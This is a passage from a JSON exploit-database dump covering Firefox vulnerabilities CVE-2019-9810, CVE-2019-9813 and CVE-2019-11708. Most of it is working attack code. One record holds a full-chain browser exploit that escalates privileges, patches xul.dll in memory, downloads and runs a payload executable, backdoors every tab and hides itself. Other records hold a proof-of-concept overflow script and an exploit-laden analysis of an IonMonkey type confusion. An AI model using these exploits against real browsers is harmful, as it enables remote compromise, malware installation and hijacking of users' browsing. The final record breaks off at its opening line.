as well as don't play with non http origins (I've seen empty/null origins).\r\n //\r\n\r\n if(!content.document.location.origin.startsWith('http')) {\r\n return;\r\n }\r\n\r\n //\r\n // Time to party! Let's find every `A` tag and make them point to doar-e.\r\n // We also use this opportunity to make every `backgroundImage` / `backgroundColor`\r\n // style attributes to `none` / `transparent` to not hide the doar-e background.\r\n //\r\n\r\n for(const Node of content.document.getElementsByTagName('*')) {\r\n if(Node.tagName == 'A') {\r\n Node.href = 'https://doar-e.github.io/';\r\n continue;\r\n }\r\n\r\n Node.style.backgroundImage = 'none';\r\n Node.style.backgroundColor = 'transparent';\r\n }\r\n\r\n //\r\n // Change the background.\r\n //\r\n\r\n content.document.body.style.backgroundImage = 'url(https://doar-e.github.io/images/themes03_light.gif)';\r\n }\r\n\r\n //\r\n // First we set an event handler to make sure to be invoked when a new `content`\r\n // is created. Keep in mind that we basically have ~three cases to handle:\r\n // 1/ We are getting injected in an already existing tab,\r\n // 2/ We are getting injected in a new tab,\r\n // 3/ A user clicks on a link and a new `content` gets created.\r\n // We basically want to have control over those three events. 
The below ensures\r\n // we get a chance to execute code for 2/.\r\n //\r\n\r\n addEventListener('DOMWindowCreated', FrameScriptPayload);\r\n dump(`Hello from: ${content.location.origin}\\n`);\r\n\r\n if(content.document != null && content.document.body != null) {\r\n\r\n //\r\n // Either the tab already existed in which case we already have a document which we\r\n // can play with...\r\n //\r\n\r\n PimpMyDocument();\r\n return;\r\n }\r\n\r\n //\r\n // ..Or it doesn't exist quite yet and we want to get a callback when it does.\r\n //\r\n\r\n content.addEventListener('load', PimpMyDocument);\r\n}\r\n\r\n//\r\n// This function drops a file (open + write + close) using the OSFile JS module.\r\n//\r\n\r\nfunction DropFile(Path, Content) {\r\n\r\n //\r\n // We expect either a string or a TypedArray.\r\n //\r\n\r\n const Encoder = new TextEncoder();\r\n const ContentBuffer = (typeof Content == 'string') ? Encoder.encode(Content) : Content;\r\n return OS.File.open(Path, {write: true, truncate: true})\r\n .then(File => {\r\n return Promise.all([\r\n // We return the File object in order to be able to use it in the\r\n // next `.then`. 
This allows us to chain the `write` and the `close`\r\n // without another level of deepness.\r\n File,\r\n File.write(ContentBuffer),\r\n ]);\r\n })\r\n .then((Results) => {\r\n const [File, _WrittenBytes] = Results;\r\n return File.close();\r\n });\r\n}\r\n\r\n//\r\n// This function drops / executes a payload binary, as well as inject a frame script\r\n// into every tabs.\r\n//\r\n\r\nfunction Payload() {\r\n\r\n //\r\n // Import a bunch of JS modules we will be using later.\r\n //\r\n\r\n const { OS } = Components.utils.import('resource://gre/modules/osfile.jsm');\r\n const { Services } = Components.utils.import('resource://gre/modules/Services.jsm');\r\n\r\n //\r\n // First order of business, we create a first promise that downloads the payload\r\n // (aka Slime Shady), drops it in the profile directory and finally executes it.\r\n //\r\n\r\n const Dir = OS.Constants.Path.localProfileDir;\r\n const PayloadPath = OS.Path.join(Dir, 'slimeshady.exe');\r\n const PayloadPromise = fetch(`${location.origin}/payload/bin/payload.exe`)\r\n .then((Response) => {\r\n\r\n //\r\n // We return the result as a TypedArray as this is what `DropFile`\r\n // expects for binary content.\r\n //\r\n\r\n return Response.arrayBuffer();\r\n })\r\n .then((Content) => {\r\n\r\n //\r\n // Time to drop the file now. Note that we return the promise so\r\n // the next `then` executes when the file has been successfully dropped.\r\n //\r\n\r\n dbg(`Payload downloaded.`);\r\n return DropFile(PayloadPath, new Uint8Array(Content));\r\n })\r\n .then(() => {\r\n\r\n //\r\n // At this point, we are ready to spawn the payload, let's do it!\r\n //\r\n\r\n dbg(`Creating the process.. ${PayloadPath}`);\r\n CreateProcessA(PayloadPath);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in payload promise: ${Ex}`);\r\n });\r\n\r\n //\r\n // Second order of business is to backdoor the tabs. 
To do so, we drop a frame\r\n // script that we inject into every tabs.\r\n //\r\n\r\n const FramePayloadContent = `${FrameScriptPayload.toSource()}\r\n\r\nFrameScriptPayload();`;\r\n const ScriptPath = OS.Path.join(Dir, 'frame-script.js');\r\n const FramePayloadPromise = DropFile(ScriptPath, FramePayloadContent)\r\n .then(() => {\r\n\r\n //\r\n // At this time we are ready to inject the frame script into the tabs.\r\n // Note that we need to drop the file locally / use the file:// scheme\r\n // so that the tabs accept to interpret the file (unfortunately,\r\n // remote ones are ignored).\r\n //\r\n\r\n dbg(`About to loadFrameScript: ${ScriptPath}`);\r\n Services.mm.loadFrameScript(`file://${ScriptPath}`, true);\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in frame payload promise: ${Ex}`);\r\n });\r\n\r\n\r\n //\r\n // Last but not least, we set up code to execute on completion of both the above\r\n // promises. You have to remember that at this point the modal window is still open\r\n // and blocks navigation / UI interaction, so we need to close it as soon as we can\r\n // to be as stealth as possible.\r\n // Just for kicks, we spawn a calculator when we're done because why not.\r\n //\r\n\r\n Promise.all([PayloadPromise, FramePayloadPromise])\r\n .then(() => {\r\n\r\n //\r\n // .. just for kicks.\r\n //\r\n\r\n CreateProcessA('c:\\\\windows\\\\system32\\\\calc.exe');\r\n\r\n //\r\n // Phew, we made it here let's close the window :).\r\n //\r\n\r\n window.close();\r\n })\r\n .catch(Ex => {\r\n console.log(`Exception in clean up promise: ${Ex}`);\r\n window.close();\r\n });\r\n}\r\n\r\n//\r\n// This function patches the inlined portion of xpc::AreNonLocalConnectionsDisabled()\r\n// in xul!mozilla::net::nsSocketTransport::InitiateSocket to avoid an assert when we have\r\n// god mode. 
It's far from being the cleanest way, but this is the easiest way I found.\r\n//\r\n// nsresult nsSocketTransport::InitiateSocket() {\r\n// SOCKET_LOG((\"nsSocketTransport::InitiateSocket [this=%p]\\n\", this));\r\n// nsresult rv;\r\n// bool isLocal;\r\n// IsLocal(&isLocal);\r\n// if (gIOService->IsNetTearingDown()) {\r\n// return NS_ERROR_ABORT;\r\n// }\r\n// if (gIOService->IsOffline()) {\r\n// if (!isLocal) return NS_ERROR_OFFLINE;\r\n// } else if (!isLocal) {\r\n// if (NS_SUCCEEDED(mCondition) && xpc::AreNonLocalConnectionsDisabled() &&\r\n// !(IsIPAddrAny(&mNetAddr) || IsIPAddrLocal(&mNetAddr))) {\r\n// nsAutoCString ipaddr;\r\n// RefPtr<nsNetAddr> netaddr = new nsNetAddr(&mNetAddr);\r\n// netaddr->GetAddress(ipaddr);\r\n// fprintf_stderr(\r\n// stderr,\r\n// \"FATAL ERROR: Non-local network connections are disabled and a \"\r\n// \"connection \"\r\n// \"attempt to %s (%s) was made.\\nYou should only access hostnames \"\r\n// \"available via the test networking proxy (if running mochitests) \"\r\n// \"or from a test-specific httpd.js server (if running xpcshell \"\r\n// \"tests). \"\r\n// \"Browser services should be disabled or redirected to a local \"\r\n// \"server.\\n\",\r\n// mHost.get(), ipaddr.get());\r\n// MOZ_CRASH(\"Attempting to connect to non-local address!\");\r\n// }\r\n// }\r\n//\r\n\r\nfunction PatchInitiateSocket() {\r\n\r\n //\r\n // Let's patch xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // so that it doesn't assert on us because we turned on testing features.\r\n // This is the assert we hit without the patch:\r\n //\r\n // FATAL ERROR: Non-local network connections are disabled and a connection attempt to google.com (172.217.14.206) was made.\r\n // You should only access hostnames available via the test networking proxy\r\n // (if running mochitests) or from a test-specific httpd.js server (if running\r\n // xpcshell tests). 
Browser services should be disabled or redirected to a local\r\n // server.\r\n // (4014.82c): Break instruction exception - code 80000003 (first chance)\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe92:\r\n // 00007ff9`69a66372 cc int 3\r\n //\r\n // Here is the disasembly before:\r\n //\r\n // 0:062> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 8b0d0cc7ff04 mov ecx,dword ptr [xul!disabledForTest (00007ff9`449c1cd8)]\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n // 00007ff9`3f9c55d1 488d0ddaa3df04 lea rcx,[xul!`string' (00007ff9`447bf9b2)]\r\n //\r\n // And after:\r\n //\r\n // 0:068> u xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6\r\n // xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 [c:\\mozilla-central\\netwerk\\base\\nsSocketTransport2.cpp @ 1264]:\r\n // 00007ff9`3f9c55c6 90 nop\r\n // 00007ff9`3f9c55c7 90 nop\r\n // 00007ff9`3f9c55c8 90 nop\r\n // 00007ff9`3f9c55c9 4831c9 xor rcx,rcx\r\n // 00007ff9`3f9c55cc 83f9ff cmp ecx,0FFFFFFFFh\r\n // 00007ff9`3f9c55cf 7520 jne xul!mozilla::net::nsSocketTransport::InitiateSocket+0x111 (00007ff9`3f9c55f1)\r\n //\r\n // 0:051> ? xul!mozilla::net::nsSocketTransport::InitiateSocket+0xe6 - xul\r\n // Evaluate expression: 1529286 = 00000000`001755c6\r\n //\r\n\r\n const PatchOffset = 0x001755c6n;\r\n const XulBase = BigInt(GetModuleHandleA('xul.dll').toString());\r\n const PatchAddress = XulBase + PatchOffset;\r\n const PatchContent = [0x90, 0x90, 0x90, 0x48, 0x31, 0xc9];\r\n PatchCode(PatchAddress, PatchContent);\r\n}\r\n\r\nfunction Main(Route) {\r\n\r\n //\r\n // One way to tell if we were successful with our data corruption is by checking\r\n // if we have access to the PrivilegeManager. 
If we do, it means we are running\r\n // with a privileged context, if not we don't.\r\n //\r\n\r\n const RunningFromPrivilegedJS = window.netscape.security.PrivilegeManager != undefined;\r\n if(Route == '?stage1') {\r\n\r\n //\r\n // If we are asked to run stage1 with access to a privileged context, we skip\r\n // it and move on to stage2.\r\n //\r\n\r\n if(RunningFromPrivilegedJS) {\r\n return Main('?stage2');\r\n }\r\n\r\n //\r\n // Stage1 exploits CVE-2019-9810 and performs a data corruption attack to access\r\n // a privileged JS context.\r\n //\r\n\r\n if(!ExploitCVE_2019_9810()) {\r\n console.log('Failed :(');\r\n return;\r\n }\r\n\r\n //\r\n // Once we are done with the data corruption, we refresh the page to get access\r\n // to the privileged JS context. Moving on to stage2 \\o/.\r\n //\r\n\r\n location.replace(`${location.origin}/?stage2`);\r\n }\r\n\r\n if(Route == '?stage2') {\r\n\r\n //\r\n // At this point we expect to have access to a privileged JS context.\r\n // If we don't it's probably bad news, so we'll just bail.\r\n //\r\n\r\n if(!RunningFromPrivilegedJS) {\r\n alert('problem');\r\n return;\r\n }\r\n\r\n //\r\n // Turn on privileges so that we can access the `Components` object.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // Now that we have access to the privileged context, we are also able to talk\r\n // over the frame message manager IPC and trigger CVE-2019-11708 to escape the\r\n // exploit the parent process.\r\n //\r\n\r\n TriggerCVE_2019_11708();\r\n }\r\n\r\n if(Route == '?stage3') {\r\n\r\n //\r\n // We should now be running in the broker which means we can exploit CVE-2019-9810\r\n // to perform the same attack than in stage1 but this time in the parent process.\r\n //\r\n\r\n 
if(!ExploitCVE_2019_9810()) {\r\n console.log('Elevation failed, closing the window.');\r\n window.close();\r\n }\r\n\r\n //\r\n // If we are successful it means that by refreshing the page, we should have\r\n // access to the privileged JS context from the parent process.\r\n // This basically means full compromise and we move on to backdooring the tabs,\r\n // as well as dropping the payload.\r\n //\r\n\r\n location.replace(`${location.origin}/?final`);\r\n }\r\n\r\n if(Route == '?final') {\r\n\r\n //\r\n // All right, we start of by turning on privileges so that we can access `Components`\r\n // & cie.\r\n //\r\n\r\n window.netscape.security.PrivilegeManager.enablePrivilege('doar-e');\r\n\r\n //\r\n // Before going further, let's fix xul!mozilla::net::nsSocketTransport::InitiateSocket\r\n // to avoid the Firefox being unhappy.\r\n //\r\n\r\n PatchInitiateSocket()\r\n\r\n //\r\n // We've worked hard to get here and it's time to drop the goodies :).\r\n //\r\n\r\n Payload();\r\n }\r\n}\r\n\r\nfunction Onload() {\r\n if(location.search != '') {\r\n Main(location.search);\r\n }\r\n}", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://www.exploit-db.com/download/47752"}], "zdt": [{"lastseen": "2019-03-29T01:23:29", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2019-03-27T00:00:00", "title": "Firefox 66.0.1 - Array.prototype.slice Buffer Overflow Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810"], "modified": "2019-03-27T00:00:00", "id": "1337DAY-ID-32423", "href": "https://0day.today/exploit/description/32423", "sourceData": "Firefox < 66.0.1 - 'Array.prototype.slice' Buffer Overflow \r\n\r\n<script>\r\n\r\nlet size = 64;\r\n\r\ngarr = [];\r\nj = 0;\r\nfunction gc(){\r\n\tvar tmp = [];\r\n\tfor(let i = 0;i < 0x20000;i++){\r\n\t\ttmp[i] = new Uint32Array(size * 2);\r\n\t\tfor(let j = 0;j < (size*2);j+=2){\r\n\t\t\ttmp[i][j] = 
0x12345678;\r\n\t\t\ttmp[i][j+1] = 0xfffe0123;\r\n\t\t}\r\n\t}\r\n\tgarr[j++] = tmp;\r\n}\r\n\r\nlet arr = [{},2.2];\r\n\r\nlet obj = {};\r\n\r\nobj[Symbol.species] = function(){\r\n\tvictim.length = 0x0;\r\n\tfor(let i = 0;i < 0x2000;i++){\r\n\t\tgvictim[i].length = 0x0;\r\n\t\tgvictim[i] = null;\r\n\t}\r\n\tgc();\r\n\t//Array.isArray(garr[0][0x10000]);\r\n\treturn [1.1];\r\n}\r\n\r\nlet gvictim = [];\r\n\r\nfor(let i = 0;i < 0x1000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nlet victim = [1.1,2.2];\r\nvictim.length = size;\r\nvictim.fill(3.3);\r\n\r\nfor(let i = 0x1000;i < 0x2000;i++){\r\n\tgvictim[i] = [1.1,2.2];\r\n\tgvictim[i].length = size;\r\n\tgvictim[i].fill(3.3);\r\n}\r\n\r\nfunction fake(arg){\r\n}\r\nfor(let i = 0;i < size;i++){\r\n\tfake[\"x\"+i.toString()] = 2.2;\r\n}\r\n\r\nfunction jit(){\r\n\tvictim[1] = 1.1;\r\n\tarr.slice();\r\n\t//fake.x2 = 6.17651672645e-312;\r\n\treturn victim[2];\r\n}\r\n\r\nflag = 0;\r\n\r\n\r\nfor(let i = 0;i < 0x10000;i++){\r\n\txx = jit();\r\n}\r\n\r\narr.constructor = obj;\r\n\r\nArray.isArray(victim);\r\nalert(333);\r\nalert(jit());\r\n</script>\n\n# 0day.today [2019-03-28] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32423"}, {"lastseen": "2019-04-04T23:40:13", "description": "Exploit for multiple platform in category dos / poc", "edition": 1, "published": "2019-04-03T00:00:00", "title": "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9813"], "modified": "2019-04-03T00:00:00", "id": "1337DAY-ID-32482", "href": "https://0day.today/exploit/description/32482", "sourceData": "SpiderMonkey - IonMonkey Compiled Code Fails to Update Inferred Property Types (Type Confusion)\r\n\r\nA bug in IonMonkey leaves type inference information inconsistent, which in turn allows the compilation of JITed functions that 
cause type confusions between arbitrary objects.\r\n\r\n# Prerequisites\r\n\r\nIn Spidermonkey, every JavaScript object is an instance of the JSObject class [1]. Plain JavaScript objects (e.g. ones created through an object literal) are typically instances of the NativeObject [2] class. A NativeObject is basically:\r\n\r\n* An ObjectGroup [3] which stores things like the prototype and type information for properties (see below)\r\n* The Shape [4] of the object which indicates the location of properties. A Shape could e.g. tell that property .p is stored in the 2nd property slot\r\n* Property storage [5]: a dynamically sized array in which the property values are stored. The Shapes provide indices into this array\r\n* Element storage [6]: a dynamically sized array in which elements (properties with an integer key) are stored\r\n\r\nSpidermonkey makes use of type inference to perform various optimizations in the JIT. Specifically, type inference is used to predict the types of object properties and then omit runtime type checks for them. Such a type inference system for property values is only safe as long as every property store to an object validates that the type of the new value is consistent with the existing type information or, if not, updates (\"widens\") the inferred type. In Spidermonkey's interpreter this is done in e.g. AddOrChangeProperty [7]. 
In the JIT compiler (IonMonkey), this is done through \"type barriers\" [8]: small runtime type checks that ensure the written value is consistent with what is stored as inferred type and otherwise bail out from the JITed code.\r\n\r\n# Crashing Testcase\r\n\r\nThe following program, found through fuzzing and then manually modified, crashes Spidermonkey with an assertion that verifies that type inference data is consistent with the actual values stored as properties:\r\n\r\n function hax(o, changeProto) {\r\n if (changeProto) {\r\n o.p = 42;\r\n o.__proto__ = {};\r\n }\r\n o.p = 13.37;\r\n return o;\r\n }\r\n\r\n for (let i = 0; i < 1000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n for (let i = 0; i < 10000; i++) {\r\n let o = hax({}, true);\r\n eval('o.p'); \t\t\t// Crash here\r\n }\r\n\r\n\r\nCrashes in debug builds of Spidermonkey with:\r\n\r\n Assertion failure: [infer failure] Missing type in object [Object * 0x327f2ca0aca0] p: float, at js/src/vm/TypeInference.cpp:265\r\n Hit MOZ_CRASH() at js/src/vm/TypeInference.cpp:266\r\n\r\nThis assertion expresses that type inference data is inconsistent for the property .p as the type \"float\" is not in the list of possible types but the property currently holds a float value.\r\n\r\n# Bug Analysis\r\n\r\nIn essence it appears that IonMonkey fails to realize that the ObjectGroup of the object `o` can change throughout the function (specifically during the prototype change) and thus incorrectly omits a type barrier for the second property assignment, leading to inconsistent type inference information after the property assignment.\r\n\r\nIn detail, the following appears to be happening:\r\n\r\nThe first loop runs and allocates NativeObjects with ObjectGroup OG1 and Shape S1. After some iterations the function hax is JIT compiled. At that point, the compiled code will expect to be called with an object of ObjectGroup OG1 as input. 
OG1 will have inferred types {.p: [float]} because the body of the if condition was never executed and so property .p was never set to a non-float value.\r\n\r\nThen the second loop starts running, which will allocate objects using a new ObjectGroup, OG2 (I'm not exactly sure why it's a new one here, most likely some kind of heuristic) but still using Shape S1. As such, the compiled code for hax will be invalidated [9]. Then, during the first invocation of hax with changeProto == true, a new prototype will be set for o, which will\r\n\r\n1. cause a new ObjectGroup to be allocated for O (because prototypes are stored in the object group) and\r\n2. cause the previous object group (OG2) to discard any inferred types and set the state of inferred properties to unknown [10]. An ObjectGroup with unknownProperties is then never again used for type inference of properties [11].\r\n\r\nAt a later point in the loop, the function is recompiled, but this time it is compiled to expect an object of ObjectGroup OG1 or OG2 as input. The JIT compiled code for hax will now look something like this (pseudocode):\r\n\r\n // Verify that the input is an object with ObjectGroup OG1 or OG2 (actually\r\n // this check is performed before entering the JITed code)\r\n VerifyInputTypes\r\n\r\n if (changeProto) {\r\n // A SetProperty [12] inline cache [13] which will perform the actual\r\n // property store and speed up subsequent property stores on objects of\r\n // the same Shape and Group. Since a type barrier is required, the Group\r\n // is used as an additional index into the cache so that both Shape and\r\n // Group must match, in which case no inferred types could be\r\n // accidentially invalidated.\r\n SetPropertyICWithTypeBarrier o.p 42\r\n\r\n Call ChangePrototype(o, {})\r\n }\r\n\r\n // Another inline cache to store property .p again, but this time without a\r\n // type barrier. 
As such, only the Shape will be checked and not the Group.\r\n SetPropertyIC o.p 13.37\r\n\r\n Return o\r\n\r\nAfter compilation finishes, the following happens in the first invocation of the JITed code:\r\n\r\n* The function is called with an object of ObjectGroup OG2 and Shape S1\r\n* The property .p is stored on the object in the first SetProperty cache. This does not update any inferred type as OG2 does not use inferred types\r\n* The prototype of o is changed\r\n * This again causes a new ObjectGroup, OG3, to be allocated\r\n * When creating the new group, property types are inferred from the current object (this is possible because it is the only object using the new group) [14]\r\n * As such, o now has an ObjectGroup OG3 with inferred types {.p: [int]}\r\n* The second propertystore cache runs into a cache miss (because it is empty at this point)\r\n * Execution transfers to the slow path (a runtime property store)\r\n * This will store the property and update the inferred types of OG3 to {.p: [int, float]}\r\n * It will then update the inline cache to now directly handle property stores to objects with shape S1\r\n * Because this SetPropertyIC is not marked as requiring a type barrier, the cache only guards on the Shape, not the Group [15]\r\n\r\nThen, in the second invocation of the JITed code:\r\n\r\n* As above, a new ObjectGroup OG4 is allocated for o with inferred types {.p: [int]} when changing the prototype\r\n* The second SetPropertyIC now runs into a cache hit (because it only looks at the Shape which is still S1)\r\n* It then directly writes the property value into the property slot without updating inferred types\r\n\r\nAs such, after the second invocation the returned object is one whose ObjectGroup (OG4) states that the property .p must be an integer but it really is a float. 
At this time, any validation of inferred types will crash with an assertion as happens during the runtime property lookup of .p in the call to eval().\r\n\r\nThe core issue here is that the second property store was marked as not requiring a type barrier. To understand why, it is necessary to look into the logic determining whether a property write should be guarded with a type barrier, implemented in jit::PropertyWriteNeedsTypeBarrier [16]. The logic of that function is roughly:\r\n\r\n1. Iterate over the set of possible object types, in this case that is OG1 and OG2\r\n2. For every group, check whether storing a value of type T (in this case float) would violate inferred property types\r\n\t- In this case, OG1 already has the correct type for property .p, so no violation there\r\n\t- And OG2 does not even track property types, so again no violation [17]\r\n3. If no violations were found, no type barrier is needed\r\n\r\nThe problem is that PropertyWriteNeedsTypeBarrier operates on the possible ObjectGroups of the input object at the beginning of the function which are not necessarily the same as at the time the property store is performed. As such, it fails to realize that the input object can actually have an ObjectGroup (in this case OG4) that has inferred property types that would be violated by the property write. It then falsely determines that a type barrier is not needed, leading to the scenario described above.\r\n\r\n# Exploitation\r\n\r\nExploitation of this type of vulnerability comes down to JIT compiling a function in such a way that the compiler makes use of type inference data to omit runtime type checks. Afterwards a type confusion between arbitrary objects can be achieved.\r\n\r\nThe following code demonstrates this by setting the inferred type to Uint8Array but actually storing an object with controlled property values (overlapping with internal fields of a Uint8Array) in the property. 
It then compiles code (the function pwn) to omit type checks on the property value based on its inferred types, thus treating the custom object as a Uint8Array and crashing when reading from 0x414141414141:\r\n\r\n let ab = new ArrayBuffer(1024);\r\n\r\n function hax(o, changeProto) {\r\n // The argument type for |o| will be object of group OG1 or OG2. OG1 will\r\n // have the inferred types {.p: [Y]}. OG2 on the other hand will be an\r\n // ObjectGroup with unknown property types due to the prototype change. As\r\n // such, OG2 will never have any inferred property types.\r\n\r\n // Ultimately, this code will confuse types X and Y with each other.\r\n // Type X: a Uint8Array\r\n let x = new Uint8Array(1024);\r\n // Type Y: a unboxed object looking a bit like a Uint8Array but with controlled data... :)\r\n let y = {slots: 13.37, elements: 13.38, buffer: ab, length: 13.39, byteOffset: 13.40, data: 3.54484805889626e-310};\r\n\r\n if (changeProto) {\r\n o.p = x;\r\n\r\n // This prototype change will cause a new ObjectGroup, OG_N, to be\r\n // allocated for o every time it is executed (because the prototype is\r\n // stored in the ObjectGroup). During creation of the new ObjectGroup,\r\n // the current property values will be used to infer property types. As\r\n // such, OG_N will have the inferred types {.p: [X]}.\r\n o.__proto__ = {};\r\n }\r\n\r\n // This property write was not marked as requiring type barriers to\r\n // validate the consistency of inferred property types. The reason is that\r\n // for OG1, the property type is already correct and OG2 does not track\r\n // property types at all. However, IonMonkey failed to realize that the\r\n // ObjectGroup of o could have changed in between to a new ObjectGroup that\r\n // has different inferred property types. 
As such, the type barrier\r\n // omission here is unsafe.\r\n //\r\n // In the second invocation, the inline cache for this property store will\r\n // then be a hit (because the IC only uses the Shape to index the cache,\r\n // not the Group). As such, the inferred types associated with the\r\n // ObjectGroup for o will not be updated and will be left inconsistent.\r\n o.p = y;\r\n\r\n return o;\r\n }\r\n\r\n function pwn(o, trigger) {\r\n if (trigger) {\r\n // Is on a code path that wasn't executed in the interpreter so that\r\n // IonMonkey solely relies on type inference instead of type profiles\r\n // from the interpreter (which would show the real type).\r\n return o.p[0];\r\n } else {\r\n return 42;\r\n }\r\n }\r\n\r\n // \"Teach\" the function hax that it should accept objects with ObjectGroup OG1.\r\n // This is required as IonMonkey needs to have at least one \"known\" type when\r\n // determining whether it can omit type barriers for property writes:\r\n // https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6282\r\n for (let i = 0; i < 10000; i++) {\r\n hax({}, false);\r\n }\r\n\r\n // Compile hax to trigger the bug in such a way that an object will be created\r\n // whose ObjectGroup indicates type X for property .p but whose real type will\r\n // be Y, where both X and Y can be arbitrarily chosen.\r\n let evilObj;\r\n for (let i = 0; i < 10000; i++) {\r\n evilObj = hax({}, true);\r\n\r\n // Not sure why this is required here, it maybe prevents JITing of the main\r\n // script or similar...\r\n eval('evilObj.p');\r\n }\r\n\r\n // JIT compile the second function and make it rely on the (incorrect) type\r\n // inference data to omit runtime type checks.\r\n for (let i = 0; i < 100000; i++) {\r\n pwn(evilObj, false);\r\n }\r\n\r\n // Finally trigger a type confusion.\r\n pwn(evilObj, true);\r\n\r\nNote, this way of exploiting the issue requires UnboxedObjects [18] which have recently been disabled by 
default [19]. However, the bug itself does not require UnboxedObjects and can be exploited in other ways. UnboxedObjects are just the most (?) convenient way.\r\n\r\n[1] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.h#L54\r\n[2] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L463\r\n[3] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/ObjectGroup.h#L87\r\n[4] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/Shape.h#L37\r\n[5] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L466\r\n[6] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.h#L469\r\n[7] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1448\r\n[8] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.h#L10254\r\n[9] https://blog.mozilla.org/javascript/2012/10/15/the-ins-and-outs-of-invalidation/\r\n[10] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/JSObject.cpp#L2219\r\n[11] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/TypeInference.cpp#L2946\r\n[12] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/IonIC.h#L280\r\n[13] https://www.mgaudet.ca/technical/2018/6/5/an-inline-cache-isnt-just-a-cache\r\n[14] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/NativeObject.cpp#L1259\r\n[15] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/CacheIR.cpp#L3544\r\n[16] 
https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6268\r\n[17] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/jit/MIR.cpp#L6293\r\n[18] https://github.com/mozilla/gecko-dev/blob/3ecf89da497cf1abe2a89d1b3c282b48e5dfac8c/js/src/vm/UnboxedObject.h#L187\r\n[19] https://github.com/mozilla/gecko-dev/commit/26965039e60a00b3600ce2e6a559106e4a3a30ca\r\n\r\n Bugzilla entry: https://bugzilla.mozilla.org/show_bug.cgi?id=1538120\r\n\r\n\r\n Fixed in https://www.mozilla.org/en-US/security/advisories/mfsa2019-09/#CVE-2019-9813 (bug collision with a pwn2own entry)\r\n\r\nThe issue was fixed in two ways:\r\n\r\n1. in https://github.com/mozilla/gecko-dev/commit/0ff528029590e051baa60265b3af92a632a7e850 the code that adds inferred properties after a prototype change (step `* When creating the new group, property types are inferred from the current object` above) was changed to no longer create inferred property types when coming from Groups marked as having unknownProperties. As such, in this case the new ObjectGroups created from OG2 would now all have unknownProperties as well.\r\n\r\n2. 
in https://github.com/mozilla/gecko-dev/commit/f8ce40d176067800e5dda013fb4d8ff9e91d9a88 the function responsible for determining whether write barriers can be omitted (jit::PropertyWriteNeedsTypeBarrier) was modified to always emit write barriers if one of the input groups has unknownProperties.\n\n# 0day.today [2019-04-04] #", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://0day.today/exploit/32482"}, {"lastseen": "2019-12-09T22:07:26", "description": "Exploit for windows platform in category local exploits", "edition": 1, "published": "2019-12-09T00:00:00", "title": "Mozilla FireFox (Windows 10 x64) - Full Chain Client Side Attack Exploit", "type": "zdt", "bulletinFamily": "exploit", "cvelist": ["CVE-2019-9810", "CVE-2019-11708"], "modified": "2019-12-09T00:00:00", "id": "1337DAY-ID-33639", "href": "https://0day.today/exploit/description/33639", "sourceData": "// Axel '0vercl0k' Souchet - November 19 2019\r\n\r\n// EDB Note: Download ~ 